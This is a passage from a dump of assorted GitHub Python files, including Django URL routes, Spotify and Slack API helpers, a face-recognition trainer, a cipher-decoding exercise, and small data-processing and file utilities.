numpy as np\n from pkg_resources import resource_filename\n from desiutil.sklearn import GaussianMixtureModel\n\n #Path to model .fits files\n pathToModels = resource_filename('desitarget', \"mock/data\")\n\n #Load the mixture model for the specified target_type\n if target_type == 'LRG':\n model = GaussianMixtureModel.load(pathToModels + '/lrg_gmm.fits')\n elif target_type == 'ELG':\n model = GaussianMixtureModel.load(pathToModels + '/elg_gmm.fits')\n elif target_type == 'QSO':\n model = GaussianMixtureModel.load(pathToModels + '/qso_gmm.fits')\n elif target_type == 'BGS':\n model = GaussianMixtureModel.load(pathToModels + '/bgs_gmm.fits')\n\n #Generate a sample of magnitudes of size n_targets\n params = model.sample(n_samples=n_targets, random_state=random_state)\n\n if target_type == 'QSO':\n\n samp = np.empty(n_targets, dtype=[('g', 'f4'), ('r', 'f4'), ('z', 'f4'),\n ('w1', 'f4'), ('w2', 'f4'), ('w3', 'f4'),\n ('w4', 'f4')])\n\n samp['g'] = params[:,0]\n samp['r'] = params[:,1]\n samp['z'] = params[:,2]\n samp['w1'] = params[:,3]\n samp['w2'] = params[:,4]\n samp['w3'] = params[:,5]\n samp['w4'] = params[:,6]\n\n else:\n\n samp = np.empty(n_targets, dtype=[('g', 'f4'), ('r', 'f4'), ('z', 'f4'), ('w1', 'f4'),\n ('w2', 'f4'), ('w3', 'f4'), ('w4', 'f4'),\n ('exp_r', 'f4'), ('exp_e1', 'f4'), ('exp_e2', 'f4'),\n ('dev_r', 'f4'), ('dev_e1', 'f4'), ('dev_e2', 'f4')])\n\n samp['g'] = params[:,0]\n samp['r'] = params[:,1]\n samp['z'] = params[:,2]\n samp['w1'] = params[:,3]\n samp['w2'] = params[:,4]\n samp['w3'] = params[:,5]\n samp['w4'] = params[:,6]\n samp['exp_r'] = params[:,7]\n samp['exp_e1'] = params[:,8]\n samp['exp_e2'] = params[:,9]\n samp['dev_r'] = params[:,10]\n samp['dev_e1'] = params[:,11]\n samp['dev_e2'] = params[:,12]\n\n return samp\n","repo_name":"michaelJwilson/LBGCMB","sub_path":"desihub/desitarget/py/desitarget/mock/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":5892,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"6115567906","text":"from django.urls import path \r\nfrom . import views\r\nfrom django.conf import settings\r\nfrom django.conf.urls.static import static\r\nimport os \r\n\r\n\r\n\r\nurl_patterns = [ \r\n path('',views.login),\r\n path('makeroom/',views.makeroom),\r\n path('joinroom/',views.joinroom),\r\n path('chatroom//',views.chatroom), \r\n path('middle/',views.middlewebpage)\r\n]\r\napi_urls = [\r\n path('checkroom//',views.roomcheckApi),\r\n path('makeroom/',views.makeroomApi),\r\n path('makeuser//',views.makeAccountApi),\r\n]\r\n\r\nif settings.DEBUG:\r\n url_patterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\r\n\r\n\r\n\r\n#1:26","repo_name":"mustafahhh/Python-web-projects-","sub_path":"webprojects/Chatting website/web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"458801939","text":"from django.urls import path\nfrom . import views\n\n\napp_name = 'body'\nurlpatterns = [\npath('', views.body , name = 'body'),\npath('add', views.addStudent, name = 'add'),\npath('details', views.details, name = 'details'),\npath('edit/', views.editForm , name = 'change'),\n]\n","repo_name":"SuryaVeda/arsu","sub_path":"ARSU/body/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8075025842","text":"#!/usr/bin/env python3\nimport util\nimport acceptance\nimport matplotlib.pyplot as plt\nimport argparse\nimport numpy as np\nimport time\nimport h5py\nimport sys\nimport scipy as sp\nimport timeit\nimport os\nfrom acceptance import datatype as data_type\n\n_defualt_plot_dir = 'plots'\\\n\n\ndef initHDF5File(output_file, name, dtype=data_type):\n\twith h5py.File(output_file, 'a') as f:\n\t \tf.create_dataset(name, (0,), dtype=dtype, maxshape=(None,))\n\ndef updateHDF5File(output_file, name, data):\n\tif len(data):\n\t\twith h5py.File(output_file, 'a') as f:\n\t\t\tndata = len(f[name])\n\t\t\tf[name].resize((ndata+len(data),))\n\t\t\tf[name][ndata:] = data\n\ndef main(dirname, plot_dir=_defualt_plot_dir, data_file_prefix='data_'):\n\n\tfiles = util.get_list_of_h5_files(dirname)\n\tdata = dict()\n\tplotdir = plot_dir + '/'\n\tprefix = plotdir\n\n\tfor ifile, file in enumerate(files):\n\t\tfilename = prefix+data_file_prefix+file.split('/')[-1]\n\t\tprint(filename)\n\t\tif not os.path.exists(filename): \n\t\t\tinitHDF5File(filename, 'data')\n\t\tstart = time.time()\n\t\tfull_start = time.time()\n\t\tprint(file)\n\t\tif True:\n\t\t#try:\n\t\t\tdatalog = h5py.File(file, 'r')\n\t\t\tall_trajectories = datalog['trajectories']\n\t\t\tall_segments = datalog['segments']\n\t\t\tall_vertices = datalog['vertices']\n\t\t\tall_stack = datalog['particle_stack']\n\t\t\tthis_result = acceptance.main(all_segments, all_trajectories, all_stack, all_vertices)\n\t\t\tprint('full time:', time.time()-full_start)\n\t\t\tupdateHDF5File(filename, 'data', this_result)\n\t\t#except:\n\t\t#\tprint('error processing file')\n\t\t#\tcontinue\n\n\treturn\n\n\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--dirname', '-i', type=str, help='''Directory containing edep-sim files converted to hdf5''')\n\tparser.add_argument('--plot_dir', type=str, default=_defualt_plot_dir, help='''Directory name to write plots''')\n\t#parser.add_argument('--tag_muons', action='store_true', default=False, help='''Flag to do muon-tagging analysis. Default to false''')\n\targs = parser.parse_args()\n\tc = main(**vars(args))","repo_name":"seg188/Minerva-2x2-Containment-Study","sub_path":"spill_analysis/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43201597294","text":"import os,io\nfrom google.cloud import vision\nfrom google.cloud.vision import types\n#import panda as pd\nos.environ['GOOGLE_APPLICATION_CREDENTIALS']='learning-perspective-7179ad627978.json'\n\nclient = vision.ImageAnnotatorClient()\n#print (dir(client))\n\nwith io.open(\"abcd.jpeg\",'rb') as image_file:\n content =image_file.read()\nimage=vision.types.Image(content=content)\nresponse=client.text_detection(image=image)\n#df=pd.Dataframe(columns=['locale','description'])\nprint(response.text_annotations.descriptions)","repo_name":"gupta2022/Learning-Perspective","sub_path":"vision_test.py","file_name":"vision_test.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"9284952806","text":"import asynctest\nimport json\nfrom asynctest.mock import call\nfrom asynctest.mock import patch\n\n\nclass TestSlackUser(asynctest.TestCase):\n\n def setUp(self):\n patcher1 = patch('charlesbot.slack.slack_connection.SlackConnection.api_call') # NOQA\n self.addCleanup(patcher1.stop)\n self.mock_api_call = patcher1.start()\n\n from charlesbot.slack.slack_connection import SlackConnection\n self.slack_connection = SlackConnection()\n\n from charlesbot.slack.slack_user import SlackUser\n self.su = SlackUser()\n\n def tearDown(self):\n self.slack_connection._drop()\n\n @asynctest.ignore_loop\n def test_user_equality(self):\n from charlesbot.slack.slack_user import SlackUser\n user1 = SlackUser(id=\"SU01\",\n name=\"userone\",\n color=\"red\")\n user2 = SlackUser(id=\"SU02\",\n name=\"usertwo\",\n color=\"blue\")\n self.assertNotEqual(user1, user2)\n user2.id = \"SU01\"\n self.assertNotEqual(user1, user2)\n user2.name = \"userone\"\n self.assertNotEqual(user1, user2)\n user2.color = \"red\"\n self.assertEqual(user1, user2)\n\n @asynctest.ignore_loop\n def test_user_return_string(self):\n self.su.id = \"SU01\"\n self.su.name = \"User One\"\n self.su.deleted = False\n self.su.is_admin = False\n self.su.has_2fa = True\n user_json = json.loads(str(self.su))\n self.assertEqual(user_json.get('id'), \"SU01\")\n self.assertEqual(user_json.get('name'), \"User One\")\n self.assertEqual(user_json.get('deleted'), False)\n self.assertEqual(user_json.get('is_admin'), False)\n self.assertEqual(user_json.get('has_2fa'), True)\n self.assertEqual(user_json.get('is_owner'), \"\")\n\n def test_empty_slack_response(self):\n self.su.name = \"suser\"\n self.mock_api_call.side_effect = [\"{}\"]\n yield from self.su.retrieve_slack_user_info(self.slack_connection,\n \"fake123\")\n expected_call = call(\"users.info\", user=\"fake123\")\n self.assertEqual(self.mock_api_call.mock_calls,\n [expected_call]),\n self.assertEqual(self.su.name, \"suser\")\n self.assertEqual(self.su.last_name, \"\")\n self.assertEqual(self.su.is_bot, \"\")\n\n def test_no_profile_key(self):\n self.su.name = \"suser\"\n user_info = {\n \"ok\": True,\n \"user\": {\n \"id\": \"U023BECGF\",\n \"name\": \"bobby\"\n }\n }\n self.mock_api_call.side_effect = [json.dumps(user_info)]\n yield from self.su.retrieve_slack_user_info(self.slack_connection,\n \"fake123\")\n expected_call = call(\"users.info\", user=\"fake123\")\n self.assertEqual(self.mock_api_call.mock_calls,\n [expected_call]),\n self.assertEqual(self.su.name, \"bobby\")\n self.assertEqual(self.su.id, \"U023BECGF\")\n self.assertEqual(self.su.last_name, \"\")\n self.assertEqual(self.su.is_bot, \"\")\n\n def test_with_profile_key(self):\n self.su.name = \"suser\"\n user_info = {\n \"ok\": True,\n \"user\": {\n \"id\": \"U023BECGF\",\n \"name\": \"bobby\",\n \"profile\": {\n \"real_name\": \"Bobby Tables\",\n \"image_24\": \"https://www.tables.com\",\n }\n }\n }\n self.mock_api_call.side_effect = [json.dumps(user_info)]\n yield from self.su.retrieve_slack_user_info(self.slack_connection,\n \"fake123\")\n expected_call = call(\"users.info\", user=\"fake123\")\n self.assertEqual(self.mock_api_call.mock_calls,\n [expected_call]),\n self.assertEqual(self.su.name, \"bobby\")\n self.assertEqual(self.su.id, \"U023BECGF\")\n self.assertEqual(self.su.real_name, \"Bobby Tables\")\n self.assertEqual(self.su.image_24, \"https://www.tables.com\")\n self.assertEqual(self.su.is_bot, \"\")\n","repo_name":"marvinpinto/charlesbot","sub_path":"tests/slack/test_slack_user.py","file_name":"test_slack_user.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"40"} +{"seq_id":"11859952767","text":"### LeetCode\n### 336. Palindrome Pairs https://leetcode.com/problems/palindrome-pairs/\n### <파이썬 알고리즘 인터뷰> 57. 팰린드롬 페어\n\nfrom typing import List\n\nclass Solution:\n def is_palindrome(self, merged_string: str) -> bool:\n left, right = 0, len(merged_string)-1\n while left < right:\n if merged_string[left] == merged_string[right]:\n left += 1\n right -= 1\n else:\n return False\n return True\n\n def palindromePairs(self, words: List[str]) -> List[List[int]]:\n \"\"\"\n Time Limit Exceeded\n Trie 자료구조를 쓰지 않으면 시간내로 풀 수 없는 문제\n \"\"\"\n answer = list()\n for idx1 in range(len(words)):\n for idx2 in range(len(words)):\n if idx1 == idx2: continue\n if self.is_palindrome(words[idx1] + words[idx2]):\n answer.append([idx1, idx2])\n return answer\n\nif __name__ == \"__main__\":\n s = Solution()\n print(s.palindromePairs(\n words = [\"abcd\",\"dcba\",\"lls\",\"s\",\"sssll\"]\n ))\n print(s.palindromePairs(\n words = [\"bat\",\"tab\",\"cat\"]\n ))\n print(s.palindromePairs(\n words = [\"a\",\"\"]\n ))\n","repo_name":"shhommychon/CodingSkillTest-old","sub_path":"Python/Naver_boostcamp/220513_lc_336.py","file_name":"220513_lc_336.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43802067097","text":"from email import message\nfrom tkinter import*\nfrom tkinter import ttk\nfrom PIL import Image,ImageTk\nfrom tkinter import messagebox\nimport cv2\nimport os\nimport numpy as np\n\nclass train:\n def __init__(self,root):\n self.root= root\n self.root.geometry(\"1530x790+0+0\")\n self.root.title(\"Train the images\")\n\n\n #background \n img=Image.open(r\"C:\\Users\\mukes\\Desktop\\images\\train.png\")\n img=img.resize((1530,790),Image.ANTIALIAS)\n self.photo=ImageTk.PhotoImage(img)\n\n bg_img=Label(self.root,image=self.photo)\n bg_img.place(x=0,y=0)\n\n #img1=Image.open(r\"C:\\Users\\mukes\\Desktop\\images\\trim2.png\")\n #img1=img1.resize((500,500),Image.ANTIALIAS)\n #self.photo1=ImageTk.PhotoImage(img1)\n\n #train_img1=Label(bg_img,image=self.photo1)\n #train_img1.place(x=35,y=140)\n\n #title_lbl=Label(bg_img,text=\"TRAIN YOUR DATA\",font=(\"calibri\",25,\"bold\"))\n #title_lbl.place(x=35,y=20,width=1450,height=50)\n\n lbl1=Label(bg_img,text=\"CLICK ON THE BUTTON BELOW TO TRAIN YOUR DATA\",font=(\"calibri\",16,\"bold\"),bg=\"orange\",fg=\"black\")\n lbl1.place(x=540,y=300,width=500,height=50)\n\n #button\n train_btn=Button(bg_img,text=\"TRAIN\",command=self.train_classify,width=16,font=(\"calibri\",14,\"bold\"),bg=\"skyblue\",fg=\"black\")\n train_btn.place(x=680,y=490)\n\n def train_classify(self):\n data_dir=(\"data\")\n path=[os.path.join(data_dir,file) for file in os.listdir(data_dir)]\n\n faces=[]\n ids=[]\n\n for image in path:\n img=Image.open(image).convert('L') #Gray scale image\n imageNp=np.array(img,'uint8')\n id=int(os.path.split(image)[1].split('.')[1])\n\n faces.append(imageNp)\n ids.append(id)\n cv2.imshow(\"Train\",imageNp)\n cv2.waitKey(1)==13\n ids=np.array(ids)\n\n #*********train the images*********\n clf = cv2.face_LBPHFaceRecognizer.create()\n clf.train(faces,ids)\n clf.write(\"classifier.xml\")\n cv2.destroyAllWindows()\n messagebox.showinfo(\"Result\",\"Training data completed\") \n\n\n\n\n\nif __name__ == \"__main__\":\n root=Tk()\n obj=train(root)\n root.mainloop()","repo_name":"aashay19/Face-Recognition-Project","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7909738879","text":"import os\nimport json\nimport requests\n\nUSER_NAME = os.environ['USER_NAME']\nPASSWORD = os.environ['PASSWORD']\nCLIENT_ID = os.environ['CLIENT_ID']\nCLIENT_SECRET = os.environ['CLIENT_SECRET']\nPLAYLIST_ID = os.environ['PLAYLIST_ID']\nUSER_ID = os.environ['USER_ID']\nSCOPE = os.environ['SCOPE']\nCALLBACK = os.environ['CALLBACK']\nAUTH_TOKEN = os.environ['AUTH_TOKEN']\nREFRESH_TOKEN = os.environ['REFRESH_TOKEN']\n\n\ndef add_track_to_playlist(track_id):\n if track_in_is_playlist(track_id):\n return\n\n url = 'https://api.spotify.com/v1/playlists/{playlist_id}/tracks?'.format(playlist_id=PLAYLIST_ID)\n req_headers = get_headers()\n if not req_headers:\n return\n\n req_body = {\"uris\": [\"spotify:track:{track_id}\".format(track_id=track_id)]}\n r = requests.post(url, headers=req_headers, data=json.dumps(req_body))\n\n try:\n r.raise_for_status()\n except:\n return\n\n\ndef get_tracks_in_playlist():\n url = 'https://api.spotify.com/v1/playlists/{playlist_id}/tracks?'.format(playlist_id=PLAYLIST_ID)\n req_headers = get_headers()\n if not req_headers:\n return\n\n r = requests.get(url, headers=req_headers)\n\n try:\n r.raise_for_status()\n return r.json()\n except:\n return\n\n\ndef track_in_is_playlist(track_id):\n playlist = get_tracks_in_playlist()\n for item in playlist['items']:\n if item['track']['id'] == track_id:\n return True\n return False\n\n\ndef get_headers():\n token = get_access_token()\n if not token:\n return None\n\n return {\"Authorization\": \"Bearer {0}\".format(token), 'Content-Type': 'application/json'}\n\n\ndef get_access_token():\n req_header = {'Authorization': 'Basic {}'.format(AUTH_TOKEN)}\n req_body = {'grant_type': 'refresh_token', 'refresh_token': REFRESH_TOKEN}\n r = requests.post('https://accounts.spotify.com/api/token', headers=req_header, data=req_body)\n res_json = r.json()\n\n try:\n access_token = res_json['access_token']\n return access_token\n except:\n return None","repo_name":"chaneym/anjunabot","sub_path":"function-trackstage/chalicelib/spotify.py","file_name":"spotify.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"29562145908","text":"from collections import Counter\n\n# Read in encrypted and common dictionary words\nwith open('as_encrypted.txt','r') as source:\n encrypted = source.read()\ncommon_words_string = 'the of and to in a is that for it as was with be by on not he i this are or his from at which but have an had they you were their one all we can her has there been if more when will would who so no when make can like time no just him know take people into year your good some could them see other than then now look only'\n\n# common_words is a list of the 75 most common word in English \ncommon_words = common_words_string.upper().split()\n\n# en_words_common is a list of the 50 most common words in en_words_common\nen_split = (encrypted.translate({ord(i): None for i in '.,:;_-'})).split()\nen_words_common = [word for word,num in Counter(en_split).most_common(50)]\n\n\n# Here I'm making my decoding dictionary. It'll send encrypted letters to their lowercase version. When I have decoded some letters, they will be sent to their uppercase true value. This will make it easy to investigate specific encoded letters as I'll be able to follow them throughout the text. It'll also allow me to partially decrypt the text as it'll be easy to differentiate between decoded and encoded letters. \n\n# Here I make my decoding dictionary. It will map all non alphabetic characters to themselves \n# and all the encoded characters to the the lower case version of themselves.\nalphabet = list('ABCDEFGHIJKLMNOPQRSTUVWXYZ')\ndecoded_dict = dict(zip(alphabet,[letter.lower() for letter in alphabet]))\nnot_letters = {sym for sym in set(encrypted) if not sym.isalpha()}\ndecoded_dict.update({sym:sym for sym in not_letters})\n\n\ndef decode_list(en_word_list):\n \"\"\" Returns list of decoded words when given a list \"\"\"\n return[''.join(word) for word in [[decoded_dict[letter] for letter in word] for word in en_word_list]]\n\n\ndecoded_words = decode_list(en_words_common)\ndecoded_text = decode_list(en_split)\n\n\n# I reasoned that there would be an overlap between the list of the 75 most common words in English and the 50 most common words in the encoded text. I wanted to make a function that could map the most common encoded words to potential matches in the most common words in English. The match function does this, it accepts a list of encoded words that have been passed through the decoded_dict and returns that original list and a list of the potential matches for each word in the original list. \n# \n# To be in this match list the common word must be the same length as the partially/fully encoded word. If there is a known letter in the word then the potential match must have that same letter in the same index. For example, 'Acv' can only be matched to words that start with 'A'. Unknown encoded letters cannot be mapped to letters that are already matched to encoded letters. The mapping of the letters in the encoded word to the letters in the common word must be one to one, one encoded letter is sent to one letter. This means that 'Acv' could not be matched to 'ALL' as then both 'C' and 'V' would be sent to 'L'. Equally 'Avv' could not be matched to 'AND' as then 'V' would be sent to both 'N' and 'D'\n\n\ndef match(l):\n def word_match(w):\n \"\"\" Finds a list of potential matches for a partially/fully encoded word\n Starts by eliminating all common words that are not the same length as the partially/fully encoded word (w) \"\"\"\n matches = [word for word in common_words if len(word) == len(w)]\n \n # If the letter in w is upper then it is a decoded letter so that same letter must be in the same index in all matches\n # If the letter is lowercase then it is encrypted and can be mapped to any letter that is not already mapped to an encoded letter\n for i in range(len(w)):\n if (w[i]).isupper() == True:\n matches = [word for word in matches if word[i] == w[i]]\n else:\n matches = [word for word in matches if word[i] not in decoded_dict.values()]\n # Making a copy of the current matches so that I can iterate over them which removing items if the mapping isn't one to one\n matches_copy = [word for word in matches] \n map_dict = {}\n # I iterate through all the words in the matches list and then through all the letters in each match.\n # If it is the first time the letter appears in a word then the match is removed if that encoded letter is being sent to a letter that already has another encoded letter mapped to it.\n # If the letter has appeared in the word before then the word is removed if that encoded letter is not being mapped to the same letter as it was previously\n for match in matches_copy:\n map_dict.clear()\n for i in range(len(match)):\n if w[i] not in map_dict:\n if match[i] not in map_dict.values():\n map_dict[w[i]] = match[i]\n else:\n matches.remove(match)\n break\n else:\n if map_dict[w[i]] == match[i]:\n continue \n else: \n matches.remove(match)\n break \n return(matches)\n # Retruns a list of tuples where the first item in the tuple is an encoded word and the second item is a list of the potential matches for that word.\n return([(word,word_match(word)) for word in l])\n\n\n# I then created some other functions that would help me best use match.\n# Containing returns all the words in a list containing a particular character. This will allow me to find all instances of a particular encoded letter if I use a lowercase letter as an argument.\n\n\ndef containing(letter, text):\n \"\"\" Returns a list of all the words in a text that contain a given character \"\"\"\n return([word for word in text if word.count(letter) >= 1])\n\n\n# This function will let me test my guesses by replacing all instances of a letter with another letter. \ndef replace(orig, new, text):\n \"\"\" Returns a list of words where all the occurrences of a given character are replaced with a new character \"\"\"\n return([word.replace(orig, new) for word in containing(orig, text)]) \n\n\n# This function will be very useful as I begin to decode letters. You send as arguments a partially or fully encoded word and that word decoded. It then updates the decoded dict with all the new mappings. It also updates the list of decoded words by decoding the encrypted words with the updated dictionary.\ndef update(en_word, word):\n \"\"\" Updates the decoded_dict when. Takes an encoded word that has been passed through the decoded dict (en_word) and the \n fully decoded version of that word. Also updates decoded_words by decoding all the words with the updated decoded dict \"\"\"\n global decoded_words\n decoded_dict.update(dict([(en.upper(),de.upper()) for (en,de) in list(zip(en_word,word)) if en.isupper()==False]))\n decoded_words = decode_list(en_words_common)\n\n\n# The blank function is useful in that it returns a list of all the words in decoded_words that only have one encrypted letter left in them. These are the words where the match function can be very effective as if it finds a match if is quite likely to be right.\ndef blank():\n \"\"\" Returns a subset of decoded_words where there is only one encoded word left in the word \"\"\"\n return([word for word in decoded_words if sum([1 for char in word if char.isupper()==False]) == 1])\n\nordered_char = 'e t a o i n s r h l d c u m f p g w y b v k x j q z'.upper()\nchar_dict = dict(zip(ordered_char.split(),range(1,27)))\norder_dict = dict(zip(range(1,27),ordered_char.split()))\nen_chars = (encrypted.translate({ord(i): None for i in ' .,:;_-'}))\nen_char_sorted = Counter(en_chars).most_common(26)\nen_char_dict = {pair[0]:en_char_sorted.index(pair)+1 for pair in en_char_sorted}\nen_order_dict = {en_char_sorted.index(pair)+1:pair[0] for pair in en_char_sorted}\nchar1 = 't o a w b c d s f m r h i y e g l n p u j k'.upper().split()\nchar1_dict = dict(zip(char1,range(1,27)))\norder1_dict = dict(zip(range(1,27),char1))\nen_words = (encrypted.translate({ord(i): None for i in '.,:;_-'})).split()\nen_char1 = Counter([word[0] for word in en_words]).most_common(26)\nen_char_dict1 = {pair[0]:en_char1.index(pair)+1 for pair in en_char1}\nen_order_dict1 = {en_char1.index(pair)+1:pair[0] for pair in en_char1}\nen_char_dict1.update(dict(zip([char for char in alphabet if char not in en_char_dict1],list(range(24,27)))))\n\ndef compare(enletter,letter):\n print('general frequency',(en_char_dict[enletter],enletter),(char_dict[letter],letter))\n print('1nd letter frequency',(en_char_dict1[enletter],enletter),(char1_dict[letter],letter))\n\ncompare('E','T'),compare('A','H'),compare('W','E')\n\n\n# The most common English word is 'THE' and most common word in the encoded words was 'EAW'. The frequencies of the encoded letters and the decoded letters also matched well. I deduced they were the same word. \n\nen_words_common[0],common_words[0]\nupdate('eaw','THE')\nmatch(containing('g',decoded_words))\n\n\n# I decided I would send a list of the common encoded words that contained a letter of interest to match. Then I could compare what letters the letter of interest was mapped to in the matches. If the letter of interest was being consistently mapped to one letter then I could deduce that that was the true match. For example, below we can see, for every word with matches, 'g' is being sent to 'A' in at least one of the potential matches. Therefore, I deduced that 'G' is 'A'. I repeated this process for different letters.\nmatch(containing('g',decoded_words))\nupdate('g','A')\n\n\n# I use the blank function to get new letters to try to decode. It's more likely that the match function will be able to find a single correct match for these words than for words with lots of unknowns. It's also easier to see by eye what letter should replace the encoded letter to make a word. Below I saw the word 'ApE' in the blank list and decided to try and find discover what 'p' was.\nblank()\nmatch(containing('p',decoded_words))\nupdate('p','R')\nblank()\nmatch(containing('m',decoded_words))\nupdate('m','O')\nblank()\nmatch(containing('y',decoded_words))\nupdate('y','S')\nblank()\nmatch(containing('l',decoded_words))\nupdate('l','W')\nblank()\nmatch(containing('o',decoded_words))\nupdate('o','I')\nblank()\nmatch(containing('n',decoded_words))\nupdate('n','F')\nblank()\nmatch(containing('f',decoded_words))\nupdate('Afq','AND')\nblank()\nmatch(containing('x',decoded_words))\nupdate('X','B')\nblank()\nmatch(containing('b',decoded_words))\nupdate('ErERb','EVERY')\nblank()\nmatch(containing('h',decoded_words))\nupdate('SOhIETb','society')\nblank()\nupdate('k','U')\nblank()\nupdate('USEFUu','USEFUL')\nblank()\n(containing('j',decoded_words))\nupdate('j','P')\nblank()\nupdate('s','M')\nblank()\nmatch(containing('x',decoded_words))\nupdate('x','B')\nblank()\nmatch(containing('d',decoded_words))\n\n\n# For some of the less common letters there were no/very little words in the most common encoded words that contained them. So, I searched for all the words that contained them in the whole text. Given I already had so many letters decoded it was easy to see what letter they should be mapped to. I also made to functions to help me. Remaining gives a list of the potential letters the encoded letter of interest could be mapped to. Remaining_en gives a list of all the encoded letters that have not been mapped to a letter yet. \ndef remaining_en():\n \"\"\" Returns a list of encoded letters which have not been mapped to real letters \"\"\"\n return([letter for letter in alphabet if decoded_dict[letter].upper() == letter])\ndef remaining():\n \"\"\" Returns a list of letters where their encoded letter is unknown\n uses global decoded_dict and global alphabet \"\"\"\n return([letter for letter in alphabet if letter not in [char for char in list(decoded_dict.values()) if char.isupper() == True]])\ndecoded_text = decode_list(en_split)\nremaining()\ncontaining('d',decoded_text)\nreplace('d','K', decoded_text)\nupdate('d','K')\nremaining_en()\ncontaining('c',decoded_text)\nupdate('cUDzMENT','judgement')\nupdate('SUxcECT','subject')\nremaining_en()\ncontaining('i',decoded_text)\nupdate('i','Q')\ncontaining('t',decoded_text)\nupdate('t','X')\nremaining_en()\nremaining()\n# I mapped V to Z through process of elimination. I now have a complete decoding dictionary that I can use to fully decode the encoded text.\nupdate('v','Z')\ndecrypted = ''.join([decoded_dict[letter] for letter in encrypted])\ndecrypted[:100]\n\n","repo_name":"megregan/datadecoder","sub_path":"decoding_data.py","file_name":"decoding_data.py","file_ext":"py","file_size_in_byte":12600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31957200859","text":"import os\r\nimport shutil\r\n\r\nimport pandas as pd\r\n\r\ndef convert(namecsv):\r\n file_csv = pd.read_csv(f\"Data/{namecsv}\", sep=\",\")\r\n list_csv=[list(x) for x in file_csv.values]\r\n with open(f\"Data_txt/{namecsv[0:8]}.txt\",\"w+\") as file:\r\n for els in list_csv:\r\n for el in els:\r\n file.write(f\"{el} \")\r\n file.write(\"\\n\") \r\n lines = file.readlines()\r\n with open(f\"Data_txt/{namecsv[0:8]}.txt\",\"r+\") as fil:\r\n lines = fil.readlines()\r\n fil.seek(0)\r\n fil.truncate()\r\n fil.writelines(lines[1:])\r\ndef findfileinfolder(path,fileformat):\r\n nat_list = []\r\n for file in os.listdir(path):\r\n if file.endswith(fileformat):\r\n element = os.path.join(file)\r\n nat_list.append(element)\r\n return nat_list\r\n\r\ndef delete_folder():\r\n path = folder_path+\"/Data_txt\"\r\n return shutil.rmtree(path)\r\ndef clear_folder(folder_path):\r\n if os.path.exists(folder_path):\r\n for file_name in os.listdir(folder_path):\r\n file_path = os.path.join(folder_path, file_name)\r\n if os.path.isfile(file_path):\r\n os.remove(file_path)\r\n elif os.path.isdir(file_path):\r\n shutil.rmtree(file_path)\r\n\r\n print(f\"Folder '{folder_path}' has been cleared.\")\r\n else:\r\n print(f\"Folder '{folder_path}' does not exist.\")\r\nscript_path = os.path.abspath(__file__)\r\nfolder_path = os.path.dirname(script_path)\r\nnew_folder = folder_path+\"/Data_txt\"\r\nos.makedirs(new_folder, exist_ok=True)\r\n\r\n\r\n#------- Find csv file code ------------\r\nDataall_csv = findfileinfolder(folder_path+\"/Data\", \".csv\")\r\n#------- Convert csv to txt ------------\r\nfor data_txt in Dataall_csv:\r\n convert(data_txt)\r\n\r\n","repo_name":"ToshDosAzamat/Perovskite","sub_path":"file_manager.py","file_name":"file_manager.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1198939392","text":"import subprocess\r\n\r\njar_file_path = \"engine.jar\"\r\nargument1 = \"orange\"\r\n\r\n# Run the JAR file with arguments\r\nprocess = subprocess.Popen([\"java\", \"-jar\", jar_file_path, argument1], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n\r\n# Wait for the process to finish and get the output\r\noutput, error = process.communicate()\r\nif error:\r\n print(\"Error occurred: {}\".format(error.decode()))\r\nelse:\r\n print(\"Output: {}\".format(output.decode(encoding=\"ISO-8859-1\")))\r\n","repo_name":"ckizp/search-engine","sub_path":"src/linked.py","file_name":"linked.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"22645658326","text":"import sys\nimport os\nimport re\nimport shutil\nimport time\nimport schedule\nfrom loguru import logger\n\nsys.path.append(os.sep.join(os.path.abspath(__file__).split(os.sep)[:-2]))\nfrom vta.api.ArtifaHelper import ArtifaHelper\n\nmylogger = logger.add(\n os.path.join(os.path.dirname(__file__), \"downloads.log\"),\n backtrace=True,\n diagnose=False,\n format=\"{time:YYYY-MM-DD at HH:mm:ss} | {level} | {message}\",\n rotation=\"1 week\",\n level=\"INFO\",\n)\n\n\ndef main(credentials, destination):\n autodownloader = ArtifaHelper(**credentials)\n api = \"api/storage/\" + credentials.get(\"repo\")\n\n for file in autodownloader.get_all_files(api):\n uri = file[\"downloadUri\"]\n filename = os.path.basename(uri)\n filepath = os.path.join(autodownloader.dstfolder, filename)\n if re.search(credentials.get(\"pattern\"), uri):\n if not os.path.exists(os.path.join(destination, filename)):\n downloaded = autodownloader.download(uri)\n if autodownloader.checksum(downloaded, file[\"checksums\"][\"sha1\"]):\n try:\n shutil.move(filepath, destination)\n except shutil.Error:\n logger.exception(\"Shutil error!\")\n except Exception as e:\n 